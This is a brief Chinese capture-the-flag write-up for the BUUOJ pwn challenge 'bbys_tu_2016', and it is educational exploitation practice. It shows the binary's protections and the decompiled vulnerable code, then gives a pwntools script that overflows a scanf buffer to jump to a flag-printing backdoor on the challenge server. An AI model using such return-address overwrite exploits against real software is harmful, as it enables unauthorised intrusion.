bbys_tu_2016

bbys_tu_2016

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

32位,只开了NX

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+14h] [ebp-Ch] BYREF

  puts("This program is hungry. You should feed it.");
  __isoc99_scanf("%s", &v4);
  puts("Do you feel the flow?");
  return 0;
}

栈溢出

int printFlag()
{
  char s[50]; // [esp+1Ah] [ebp-3Eh] BYREF
  FILE *stream; // [esp+4Ch] [ebp-Ch]

  stream = fopen("flag.txt", "r");
  fgets(s, 50, stream);
  puts(s);
  fflush(stdout);
  return fclose(stream);
}

有后门

思路

栈溢出到后门getshell

实际上在调试的时候发现不是ida的0xc,而是0x14

bbys_tu_2016_第1张图片

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",28559,"./pwn",0)
context(os='linux', arch='amd64',log_level='debug')

pl=cyclic(0x18)+p32(0x804856D)
sl(pl)

ia()

你可能感兴趣的:(Buuoj刷题,安全)